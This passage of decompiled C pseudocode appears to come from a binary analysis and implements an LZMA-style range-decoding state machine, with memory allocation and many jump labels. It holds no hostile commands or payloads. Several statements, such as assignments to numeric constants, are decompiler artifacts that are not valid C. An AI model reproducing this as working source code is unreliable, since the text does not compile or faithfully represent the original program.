                          													GlobalFree( *(_t613 - 8));
                          												}
                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          												 *(_t613 - 8) = _t534;
                          												if(_t534 == 0) {
                          													goto L171;
                          												} else {
                          													goto L20;
                          												}
                          											case 2:
                          												L24:
                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          												 *(_t613 - 0x84) = 6;
                          												 *(_t613 - 0x4c) = _t553;
                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                          												L132:
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											case 3:
                          												L21:
                          												__eflags =  *(_t613 - 0x6c);
                          												if( *(_t613 - 0x6c) == 0) {
                          													 *(_t613 - 0x88) = 3;
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												_t67 = _t613 - 0x70;
                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          												__eflags =  *_t67;
                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          												L23:
                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          												if( *(_t613 - 0x48) != 0) {
                          													goto L21;
                          												}
                          												goto L24;
                          											case 4:
                          												L133:
                          												_t531 =  *_t606;
                          												_t589 = _t531 & 0x0000ffff;
                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          												if( *(_t613 - 0xc) >= _t565) {
                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          													 *(_t613 - 0x40) = 1;
                          													_t532 = _t531 - (_t531 >> 5);
                          													 *_t606 = _t532;
                          												} else {
                          													 *(_t613 - 0x10) = _t565;
                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          												}
                          												if( *(_t613 - 0x10) >= 0x1000000) {
                          													goto L139;
                          												}
                          											case 5:
                          												goto L137;
                          											case 6:
                          												__edx = 0;
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x34) = 1;
                          													 *(__ebp - 0x84) = 7;
                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          													while(1) {
                          														L132:
                          														 *(_t613 - 0x54) = _t606;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          												__esi =  *(__ebp - 0x60);
                          												__cl = 8;
                          												__cl = 8 -  *(__ebp - 0x3c);
                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          												__ecx =  *(__ebp - 0x3c);
                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          												__ecx =  *(__ebp - 4);
                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          												__eflags =  *(__ebp - 0x38) - 4;
                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												if( *(__ebp - 0x38) >= 4) {
                          													__eflags =  *(__ebp - 0x38) - 0xa;
                          													if( *(__ebp - 0x38) >= 0xa) {
                          														_t98 = __ebp - 0x38;
                          														 *_t98 =  *(__ebp - 0x38) - 6;
                          														__eflags =  *_t98;
                          													} else {
                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          													}
                          												} else {
                          													 *(__ebp - 0x38) = 0;
                          												}
                          												__eflags =  *(__ebp - 0x34) - __edx;
                          												if( *(__ebp - 0x34) == __edx) {
                          													__ebx = 0;
                          													__ebx = 1;
                          													goto L61;
                          												} else {
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__ecx =  *(__ebp - 8);
                          													__ebx = 0;
                          													__ebx = 1;
                          													__al =  *((intOrPtr*)(__eax + __ecx));
                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          													goto L41;
                          												}
                          											case 7:
                          												__eflags =  *(__ebp - 0x40) - 1;
                          												if( *(__ebp - 0x40) != 1) {
                          													__eax =  *(__ebp - 0x24);
                          													 *(__ebp - 0x80) = 0x16;
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x28);
                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          													__eax =  *(__ebp - 0x2c);
                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          													__eax = 0;
                          													__eflags =  *(__ebp - 0x38) - 7;
                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          													__al = __al & 0x000000fd;
                          													__eax = (__eflags >= 0) - 1 + 0xa;
                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x664;
                          													__eflags = __eax;
                          													 *(__ebp - 0x58) = __eax;
                          													goto L69;
                          												}
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 8;
                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													L132:
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											case 8:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xa;
                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          												} else {
                          													__eax =  *(__ebp - 0x38);
                          													__ecx =  *(__ebp - 4);
                          													__eax =  *(__ebp - 0x38) + 0xf;
                          													 *(__ebp - 0x84) = 9;
                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          												}
                          												while(1) {
                          													L132:
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											case 9:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													goto L89;
                          												}
                          												__eflags =  *(__ebp - 0x60);
                          												if( *(__ebp - 0x60) == 0) {
                          													goto L171;
                          												}
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          												__eflags = _t259;
                          												0 | _t259 = _t259 + _t259 + 9;
                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          												goto L76;
                          											case 0xa:
                          												goto L0;
                          											case 0xb:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__ecx =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x20);
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												} else {
                          													__eax =  *(__ebp - 0x24);
                          												}
                          												__ecx =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												goto L88;
                          											case 0xc:
                          												L99:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xc;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t334 = __ebp - 0x70;
                          												 *_t334 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t334;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												__eax =  *(__ebp - 0x2c);
                          												goto L101;
                          											case 0xd:
                          												L37:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xd;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t122 = __ebp - 0x70;
                          												 *_t122 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t122;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L39:
                          												__eax =  *(__ebp - 0x40);
                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          													goto L48;
                          												}
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													goto L54;
                          												}
                          												L41:
                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          												 *(__ebp - 0x48) = __eax;
                          												__eax = __eax + 1;
                          												__eax = __eax << 8;
                          												__eax = __eax + __ebx;
                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edx = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													 *(__ebp - 0x40) = 1;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													__ebx = __ebx + __ebx + 1;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edx;
                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L39;
                          												} else {
                          													goto L37;
                          												}
                          											case 0xe:
                          												L46:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xe;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t156 = __ebp - 0x70;
                          												 *_t156 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t156;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												while(1) {
                          													L48:
                          													__eflags = __ebx - 0x100;
                          													if(__ebx >= 0x100) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x58);
                          													__edx = __ebx + __ebx;
                          													__ecx =  *(__ebp - 0x10);
                          													__esi = __edx + __eax;
                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                          													__ax =  *__esi;
                          													 *(__ebp - 0x54) = __esi;
                          													__edi = __ax & 0x0000ffff;
                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          													__eflags =  *(__ebp - 0xc) - __ecx;
                          													if( *(__ebp - 0xc) >= __ecx) {
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          														__cx = __ax;
                          														_t170 = __edx + 1; // 0x1
                          														__ebx = _t170;
                          														__cx = __ax >> 5;
                          														__eflags = __eax;
                          														 *__esi = __ax;
                          													} else {
                          														 *(__ebp - 0x10) = __ecx;
                          														0x800 = 0x800 - __edi;
                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          														__ebx = __ebx + __ebx;
                          														 *__esi = __cx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														continue;
                          													} else {
                          														goto L46;
                          													}
                          												}
                          												L54:
                          												_t173 = __ebp - 0x34;
                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          												__eflags =  *_t173;
                          												goto L55;
                          											case 0xf:
                          												L58:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xf;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t203 = __ebp - 0x70;
                          												 *_t203 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t203;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L60:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													L55:
                          													__al =  *(__ebp - 0x44);
                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          													goto L56;
                          												}
                          												L61:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t217 = __edx + 1; // 0x1
                          													__ebx = _t217;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L60;
                          												} else {
                          													goto L58;
                          												}
                          											case 0x10:
                          												L109:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x10;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t365 = __ebp - 0x70;
                          												 *_t365 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t365;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												goto L111;
                          											case 0x11:
                          												goto L69;
                          											case 0x12:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 0x58);
                          													 *(__ebp - 0x84) = 0x13;
                          													__esi =  *(__ebp - 0x58) + 2;
                          													while(1) {
                          														L132:
                          														 *(_t613 - 0x54) = _t606;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												__eflags = __eax;
                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                          												goto L130;
                          											case 0x13:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													_t469 = __ebp - 0x58;
                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                          													__eflags =  *_t469;
                          													 *(__ebp - 0x30) = 0x10;
                          													 *(__ebp - 0x40) = 8;
                          													L144:
                          													 *(__ebp - 0x7c) = 0x14;
                          													goto L145;
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												 *(__ebp - 0x30) = 8;
                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          												L130:
                          												 *(__ebp - 0x58) = __eax;
                          												 *(__ebp - 0x40) = 3;
                          												goto L144;
                          											case 0x14:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          												__eax =  *(__ebp - 0x80);
                          												 *(_t613 - 0x88) = _t533;
                          												goto L1;
                          											case 0x15:
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xb;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          												goto L120;
                          											case 0x16:
                          												__eax =  *(__ebp - 0x30);
                          												__eflags = __eax - 4;
                          												if(__eax >= 4) {
                          													_push(3);
                          													_pop(__eax);
                          												}
                          												__ecx =  *(__ebp - 4);
                          												 *(__ebp - 0x40) = 6;
                          												__eax = __eax << 7;
                          												 *(__ebp - 0x7c) = 0x19;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L145;
                          											case 0x17:
                          												L145:
                          												__eax =  *(__ebp - 0x40);
                          												 *(__ebp - 0x50) = 1;
                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          												goto L149;
                          											case 0x18:
                          												L146:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x18;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t484 = __ebp - 0x70;
                          												 *_t484 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t484;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L148:
                          												_t487 = __ebp - 0x48;
                          												 *_t487 =  *(__ebp - 0x48) - 1;
                          												__eflags =  *_t487;
                          												L149:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__ecx =  *(__ebp - 0x40);
                          													__ebx =  *(__ebp - 0x50);
                          													0 = 1;
                          													__eax = 1 << __cl;
                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          													__eax =  *(__ebp - 0x7c);
                          													 *(__ebp - 0x44) = __ebx;
                          													while(1) {
                          														 *(_t613 - 0x88) = _t533;
                          														goto L1;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x50);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          												__eax =  *(__ebp - 0x58);
                          												__esi = __edx + __eax;
                          												 *(__ebp - 0x54) = __esi;
                          												__ax =  *__esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													__cx = __ax >> 5;
                          													__eax = __eax - __ecx;
                          													__edx = __edx + 1;
                          													__eflags = __edx;
                          													 *__esi = __ax;
                          													 *(__ebp - 0x50) = __edx;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L148;
                          												} else {
                          													goto L146;
                          												}
                          											case 0x19:
                          												__eflags = __ebx - 4;
                          												if(__ebx < 4) {
                          													 *(__ebp - 0x2c) = __ebx;
                          													L119:
                          													_t393 = __ebp - 0x2c;
                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                          													__eflags =  *_t393;
                          													L120:
                          													__eax =  *(__ebp - 0x2c);
                          													__eflags = __eax;
                          													if(__eax == 0) {
                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          														goto L170;
                          													}
                          													__eflags = __eax -  *(__ebp - 0x60);
                          													if(__eax >  *(__ebp - 0x60)) {
                          														goto L171;
                          													}
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          													__eax =  *(__ebp - 0x30);
                          													_t400 = __ebp - 0x60;
                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          													__eflags =  *_t400;
                          													goto L123;
                          												}
                          												__ecx = __ebx;
                          												__eax = __ebx;
                          												__ecx = __ebx >> 1;
                          												__eax = __ebx & 0x00000001;
                          												__ecx = (__ebx >> 1) - 1;
                          												__al = __al | 0x00000002;
                          												__eax = (__ebx & 0x00000001) << __cl;
                          												__eflags = __ebx - 0xe;
                          												 *(__ebp - 0x2c) = __eax;
                          												if(__ebx >= 0xe) {
                          													__ebx = 0;
                          													 *(__ebp - 0x48) = __ecx;
                          													L102:
                          													__eflags =  *(__ebp - 0x48);
                          													if( *(__ebp - 0x48) <= 0) {
                          														__eax = __eax + __ebx;
                          														 *(__ebp - 0x40) = 4;
                          														 *(__ebp - 0x2c) = __eax;
                          														__eax =  *(__ebp - 4);
                          														__eax =  *(__ebp - 4) + 0x644;
                          														__eflags = __eax;
                          														L108:
                          														__ebx = 0;
                          														 *(__ebp - 0x58) = __eax;
                          														 *(__ebp - 0x50) = 1;
                          														 *(__ebp - 0x44) = 0;
                          														 *(__ebp - 0x48) = 0;
                          														L112:
                          														__eax =  *(__ebp - 0x40);
                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          															_t391 = __ebp - 0x2c;
                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          															__eflags =  *_t391;
                          															goto L119;
                          														}
                          														__eax =  *(__ebp - 0x50);
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          														__eax =  *(__ebp - 0x58);
                          														__esi = __edi + __eax;
                          														 *(__ebp - 0x54) = __esi;
                          														__ax =  *__esi;
                          														__ecx = __ax & 0x0000ffff;
                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          														__eflags =  *(__ebp - 0xc) - __edx;
                          														if( *(__ebp - 0xc) >= __edx) {
                          															__ecx = 0;
                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          															__ecx = 1;
                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          															__ebx = 1;
                          															__ecx =  *(__ebp - 0x48);
                          															__ebx = 1 << __cl;
                          															__ecx = 1 << __cl;
                          															__ebx =  *(__ebp - 0x44);
                          															__ebx =  *(__ebp - 0x44) | __ecx;
                          															__cx = __ax;
                          															__cx = __ax >> 5;
                          															__eax = __eax - __ecx;
                          															__edi = __edi + 1;
                          															__eflags = __edi;
                          															 *(__ebp - 0x44) = __ebx;
                          															 *__esi = __ax;
                          															 *(__ebp - 0x50) = __edi;
                          														} else {
                          															 *(__ebp - 0x10) = __edx;
                          															0x800 = 0x800 - __ecx;
                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          															 *__esi = __dx;
                          														}
                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                          														if( *(__ebp - 0x10) >= 0x1000000) {
                          															L111:
                          															_t368 = __ebp - 0x48;
                          															 *_t368 =  *(__ebp - 0x48) + 1;
                          															__eflags =  *_t368;
                          															goto L112;
                          														} else {
                          															goto L109;
                          														}
                          													}
                          													__ecx =  *(__ebp - 0xc);
                          													__ebx = __ebx + __ebx;
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          														__ecx =  *(__ebp - 0x10);
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          														__ebx = __ebx | 0x00000001;
                          														__eflags = __ebx;
                          														 *(__ebp - 0x44) = __ebx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L101:
                          														_t338 = __ebp - 0x48;
                          														 *_t338 =  *(__ebp - 0x48) - 1;
                          														__eflags =  *_t338;
                          														goto L102;
                          													} else {
                          														goto L99;
                          													}
                          												}
                          												__edx =  *(__ebp - 4);
                          												__eax = __eax - __ebx;
                          												 *(__ebp - 0x40) = __ecx;
                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          												goto L108;
                          											case 0x1a:
                          												L56:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1a;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x68);
                          												__al =  *(__ebp - 0x5c);
                          												__edx =  *(__ebp - 8);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
